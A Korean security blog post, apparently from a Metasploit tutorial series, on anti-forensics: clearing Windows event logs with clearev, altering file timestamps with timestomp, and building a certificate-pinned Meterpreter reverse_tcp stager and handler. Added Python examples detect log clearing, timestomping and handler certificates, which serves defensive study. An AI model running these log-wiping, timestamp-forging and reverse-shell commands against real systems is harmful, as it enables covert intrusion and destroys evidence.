8/07/2017

[MAD-METASPLOIT] 0x40 - Anti Forensic



Remove event log
meterpreter > clearev
[*] Wiping 766 records from Application...
[*] Wiping 1375 records from System...
[*] Wiping 346 records from Security...
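Clearing a log is itself logged: after the wipe, Windows writes event 1102 ("The audit log was cleared") into the Security log and event 104 into the System log for the Application/System clears, and those records land after the clear so they survive it. The detector below is an added example, not code from the post or from Metasploit; it parses a constructed XML export in the wevtutil event schema (the sample records are made up) and flags exactly those two event IDs, which is the check a responder runs first when a host's logs look suspiciously short.

```python
import xml.etree.ElementTree as ET

# Windows event schema namespace used by wevtutil / Get-WinEvent XML exports.
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# (channel, event id) pairs written by Microsoft-Windows-Eventlog when a log is cleared.
LOG_CLEARED_EVENTS = {
    ("Security", 1102),  # "The audit log was cleared"
    ("System", 104),     # "The <Application|System> log file was cleared"
}

# Constructed sample export (not real data): a normal logon, then the two clear records.
SAMPLE_EXPORT = """<Events>
  <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
    <System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4624</EventID>
    <TimeCreated SystemTime="2017-08-07T05:20:10Z"/><Channel>Security</Channel></System>
  </Event>
  <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
    <System><Provider Name="Microsoft-Windows-Eventlog"/><EventID>104</EventID>
    <TimeCreated SystemTime="2017-08-07T05:21:00Z"/><Channel>System</Channel></System>
    <UserData><LogFileCleared xmlns="http://manifests.microsoft.com/win/2004/08/windows/eventlog">
      <SubjectUserName>Administrator</SubjectUserName><Channel>System</Channel>
    </LogFileCleared></UserData>
  </Event>
  <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
    <System><Provider Name="Microsoft-Windows-Eventlog"/><EventID>1102</EventID>
    <TimeCreated SystemTime="2017-08-07T05:21:01Z"/><Channel>Security</Channel></System>
    <UserData><LogFileCleared xmlns="http://manifests.microsoft.com/win/2004/08/windows/eventlog">
      <SubjectUserName>Administrator</SubjectUserName>
    </LogFileCleared></UserData>
  </Event>
</Events>"""


def parse_events(xml_text):
    """Yield one dict per <Event> with the System fields a detector needs."""
    root = ET.fromstring(xml_text)
    for ev in root.findall("e:Event", NS):
        sysel = ev.find("e:System", NS)
        # The clearing user sits under UserData in a different namespace;
        # match on the local tag name so the lookup works for 104 and 1102 alike.
        user = next((el.text for el in ev.iter() if el.tag.endswith("}SubjectUserName")), None)
        yield {
            "Channel": sysel.findtext("e:Channel", namespaces=NS),
            "EventID": int(sysel.findtext("e:EventID", namespaces=NS)),
            "Provider": sysel.find("e:Provider", NS).get("Name"),
            "TimeCreated": sysel.find("e:TimeCreated", NS).get("SystemTime"),
            "SubjectUserName": user,
        }


def find_log_clearing(events):
    """Return the records that show a log was cleared, oldest first."""
    hits = []
    for ev in events:
        if (ev["Channel"], ev["EventID"]) in LOG_CLEARED_EVENTS:
            hits.append({
                "channel": ev["Channel"],
                "event_id": ev["EventID"],
                "time": ev["TimeCreated"],
                "user": ev["SubjectUserName"],
            })
    return hits


if __name__ == "__main__":
    for hit in find_log_clearing(parse_events(SAMPLE_EXPORT)):
        print(hit)
```

Because clearev wipes Application, then System, then Security, the 104 written for the Application clear is itself destroyed by the System clear; only the final 104 (System) and 1102 (Security) remain on the host, which is the practical argument for forwarding events off-box before an intruder can touch them.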


Timestomp

meterpreter > timestomp

Usage: timestomp OPTIONS file_path

OPTIONS:

    -a <opt>  Set the "last accessed" time of the file
    -b        Set the MACE timestamps so that EnCase shows blanks
    -c <opt>  Set the "creation" time of the file
    -e <opt>  Set the "mft entry modified" time of the file
    -f <opt>  Set the MACE of attributes equal to the supplied file
    -h        Help banner
    -m <opt>  Set the "last written" time of the file
    -r        Set the MACE timestamps recursively on a directory
    -v        Display the UTC MACE values of the file
    -z <opt>  Set all four attributes (MACE) of the file



meterpreter > ls
Listing: C:\Users\Public
========================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40555/r-xr-xr-x   4096  dir   2017-08-07 14:20:54 +0900  Desktop
40555/r-xr-xr-x   4096  dir   2015-09-17 14:10:20 +0900  Documents
40555/r-xr-xr-x   0     dir   2009-07-14 13:41:57 +0900  Downloads
40555/r-xr-xr-x   0     dir   2009-07-14 11:04:25 +0900  Favorites
40777/rwxrwxrwx   0     dir   2015-11-23 19:00:27 +0900  Juniper Networks
40555/r-xr-xr-x   4096  dir   2015-09-17 12:14:24 +0900  Libraries
40555/r-xr-xr-x   0     dir   2009-07-14 13:41:57 +0900  Music
40555/r-xr-xr-x   0     dir   2009-07-14 13:41:57 +0900  Pictures
40555/r-xr-xr-x   0     dir   2011-04-13 06:00:52 +0900  Recorded TV
40555/r-xr-xr-x   0     dir   2009-07-14 13:41:57 +0900  Videos
100666/rw-rw-rw-  174   fil   2009-07-14 13:41:57 +0900  desktop.ini


meterpreter > timestomp desktop.ini -v
Modified      : 2009-07-14 13:41:57 +0900
Accessed      : 2009-07-14 13:41:57 +0900
Created       : 2009-07-14 13:41:57 +0900
Entry Modified: 2015-09-17 12:14:23 +0900
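The values timestomp prints and rewrites are the $STANDARD_INFORMATION timestamps. NTFS keeps a second copy in the $FILE_NAME attribute that the kernel sets on create/rename and that the same user-mode APIs cannot change, so comparing the two is the standard forensic check. The function below is an added example (not from the post or from Metasploit) over constructed $SI/$FN values; it applies three heuristics examiners use: $SI earlier than $FN, $SI times with a zeroed sub-second fraction (timestomp works at whole-second granularity while NTFS stores 100 ns ticks), and, as a weak corroborating signal, an entry-modified time far later than M/A/C like the desktop.ini output above, which on its own is also what a benign ACL change looks like.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import List


@dataclass
class MftTimes:
    """The four MACE timestamps of one MFT attribute ($STANDARD_INFORMATION or $FILE_NAME)."""
    modified: datetime
    accessed: datetime
    created: datetime
    entry_modified: datetime


def timestomp_indicators(si: MftTimes, fn: MftTimes,
                         slack: timedelta = timedelta(seconds=1)) -> List[str]:
    """Return the timestomp heuristics that fire for one file.

    si: $STANDARD_INFORMATION times (what `timestomp -v` shows; rewritable from user mode).
    fn: $FILE_NAME times (set by the kernel on create/rename; not reachable the same way).
    """
    hits = []
    # $FN is stamped at creation, so on an untouched file $SI created/modified
    # are never earlier than their $FN counterparts.
    if si.created + slack < fn.created:
        hits.append("$SI created is earlier than $FN created")
    if si.modified + slack < fn.modified:
        hits.append("$SI modified is earlier than $FN modified")
    # timestomp accepts times to the second, so every value it writes has a
    # zero sub-second part; genuine NTFS timestamps almost never do.
    if all(t.microsecond == 0 for t in (si.modified, si.accessed, si.created)):
        hits.append("$SI M/A/C have zero sub-second precision")
    # Weak: rewriting $SI bumps the entry-modified time unless -e was also
    # used, but attribute/ACL changes do the same. Corroboration only.
    if si.entry_modified > max(si.modified, si.accessed, si.created) + slack:
        hits.append("$SI entry-modified is later than all of M/A/C (weak)")
    return hits


KST = timezone(timedelta(hours=9))
_REAL_CREATE = datetime(2015, 9, 17, 12, 14, 23, 481200, tzinfo=KST)

# Constructed sample (not taken from the system in the post): $SI backdated to a
# round second in 2009 while $FN still carries the real 2015 creation time.
STOMPED_SI = MftTimes(
    modified=datetime(2009, 7, 14, 13, 41, 57, tzinfo=KST),
    accessed=datetime(2009, 7, 14, 13, 41, 57, tzinfo=KST),
    created=datetime(2009, 7, 14, 13, 41, 57, tzinfo=KST),
    entry_modified=_REAL_CREATE,
)
STOMPED_FN = MftTimes(_REAL_CREATE, _REAL_CREATE, _REAL_CREATE, _REAL_CREATE)

# Constructed clean file: created in 2015, legitimately edited in 2016.
_EDIT = datetime(2016, 1, 5, 9, 30, 0, 125000, tzinfo=KST)
CLEAN_SI = MftTimes(modified=_EDIT, accessed=_REAL_CREATE, created=_REAL_CREATE, entry_modified=_EDIT)
CLEAN_FN = MftTimes(_REAL_CREATE, _REAL_CREATE, _REAL_CREATE, _REAL_CREATE)


if __name__ == "__main__":
    print("stomped:", timestomp_indicators(STOMPED_SI, STOMPED_FN))
    print("clean:  ", timestomp_indicators(CLEAN_SI, CLEAN_FN))
```

In practice $FN values come from a parsed $MFT (for example an analyzeMFT or MFTECmd export) rather than from the live API, since a live query only ever returns the $SI copy that timestomp has already altered.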


Paranoid Meterpreter

#> openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=US/ST=Texas/L=Austin/O=Development/CN=test" -keyout test.key -out 
#> cat test.key test.crt > test.pem


#> hvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.8 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=./test.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o launch-paranoid.bat

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Saved as: launch-paranoid.bat

Running the command as above drops the .bat file specified with -o (for a Windows target).
#> ll
합계 24
drwxr-xr-x  2 hahwul hahwul 4096  7월 12 22:12 .
drwxr-xr-x 60 hahwul hahwul 4096  7월 12 22:12 ..
-rw-r--r--  1 root root 6255  7월 12 22:12 launch-paranoid.bat
-rw-r--r--  1 root root 5228  7월 12 22:06 test.pem

Viewing the generated bat file with cat shows that it uses PowerShell to run the encrypted payload.


hahwul auxiliary(test) #> use exploit/multi/handler 
hahwul exploit(handler) #> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
hahwul exploit(handler) #> set LHOST 192.168.0.8
LHOST => 192.168.0.8
hahwul exploit(handler) #> set LPORT 443
LPORT => 443
hahwul exploit(handler) #> set HandlerSSLCert ./test.pem
HandlerSSLCert => ./test.pem
hahwul exploit(handler) #> set IgnoreUnknownPayloads true
IgnoreUnknownPayloads => true
hahwul exploit(handler) #> set StagerVerifySSLCert true;
StagerVerifySSLCert => true;

hahwul exploit(handler) #> run -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.0.8:443

See the link below for details.
http://www.hahwul.com/2016/07/metasploit-meterpreter-paranoid-mode.html
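What makes this setup "paranoid" is that the stager does not trust any TLS server: HandlerSSLCert gives the handler a fixed certificate and StagerVerifySSLCert makes the generated stager compare the presented certificate's hash against the one baked in at msfvenom time, so a stager that reaches a different listener (an interceptor, or a sinkhole) refuses to continue. The snippet below is an added example, not code from the post or from Metasploit: it is a simplified model of that pin check, written with the standard library only. It reads a bundle laid out like test.pem above (key block followed by certificate block), extracts the certificate's DER bytes and hashes them; the PEM contents are constructed filler, not a real key or certificate. The same fingerprinting is what a defender applies to certificates seen on the wire to match known handler certificates.

```python
import base64
import hashlib
import re


def _pem_block(label, body):
    """Wrap raw bytes in a PEM block (64-character base64 lines)."""
    b64 = base64.b64encode(body).decode()
    lines = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return f"-----BEGIN {label}-----\n{lines}\n-----END {label}-----\n"


# Constructed bundle in the same layout as test.pem (key, then cert). Neither
# body is real ASN.1; they stand in for the DER bytes the fingerprint is taken over.
FAKE_CERT_DER = b"constructed-filler-not-a-real-DER-certificate"
HANDLER_BUNDLE = (_pem_block("PRIVATE KEY", b"constructed-filler-not-a-real-private-key")
                  + _pem_block("CERTIFICATE", FAKE_CERT_DER))

_CERT_RE = re.compile(r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S)


def certificates_from_pem(pem_text):
    """DER bytes of every CERTIFICATE block in a bundle; key blocks are skipped,
    which is why one file can carry both the key and the cert."""
    return [base64.b64decode("".join(m.group(1).split()))
            for m in _CERT_RE.finditer(pem_text)]


def fingerprint(der, algo="sha1"):
    """Hex digest of the DER certificate, the same value `openssl x509 -fingerprint`
    prints (without the colons)."""
    return hashlib.new(algo, der).hexdigest()


def pinned_handler_accepted(presented_pem, pinned_sha1):
    """Simplified model (an assumption, not Metasploit's implementation) of what
    StagerVerifySSLCert makes the stager do: continue only if the certificate the
    server presented hashes to the value embedded at build time."""
    wanted = pinned_sha1.replace(":", "").lower()
    return any(fingerprint(c) == wanted for c in certificates_from_pem(presented_pem))


if __name__ == "__main__":
    pin = fingerprint(FAKE_CERT_DER)
    print("pinned sha1:", pin)
    print("same cert accepted:", pinned_handler_accepted(HANDLER_BUNDLE, pin))
    print("other cert accepted:", pinned_handler_accepted(HANDLER_BUNDLE, "0" * 40))
```

Two consequences follow from the pin being a hash of the whole certificate: regenerating test.pem silently invalidates every stager built against the old one, and the handler's certificate is a stable artifact, so recording fingerprints of self-signed certificates seen on the network (including the default "/C=US/ST=Texas/L=Austin/O=Development/CN=test" subject copied from the documentation) gives a cheap indicator to alert on.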


Reference 

http://www.hahwul.com/2016/07/metasploit-meterpreter-paranoid-mode.html


HAHWUL

Security engineer, Gopher and H4cker!
